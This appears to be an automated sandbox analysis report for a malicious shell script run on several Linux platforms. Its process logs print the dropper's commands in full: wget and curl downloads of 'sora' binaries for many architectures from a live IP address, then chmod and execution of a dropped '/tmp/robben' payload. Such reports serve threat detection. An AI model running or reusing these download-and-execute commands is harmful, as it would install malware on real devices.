Analysis Overview
SHA256
7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d
Threat Level: Shows suspicious behavior
The file 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
System Network Configuration Discovery
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-18 02:04
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-18 02:04
Reported
2024-10-18 02:06
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
2s
Max time network
128s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh | N/A |
Processes
/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
[/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| GB | 195.181.164.14:443 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-18 02:04
Reported
2024-10-18 02:06
Platform
debian9-armhf-20240729-en
Max time kernel
10s
Max time network
11s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh | N/A |
Processes
/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
[/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-18 02:04
Reported
2024-10-18 02:06
Platform
debian9-mipsbe-20240611-en
Max time kernel
85s
Max time network
88s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
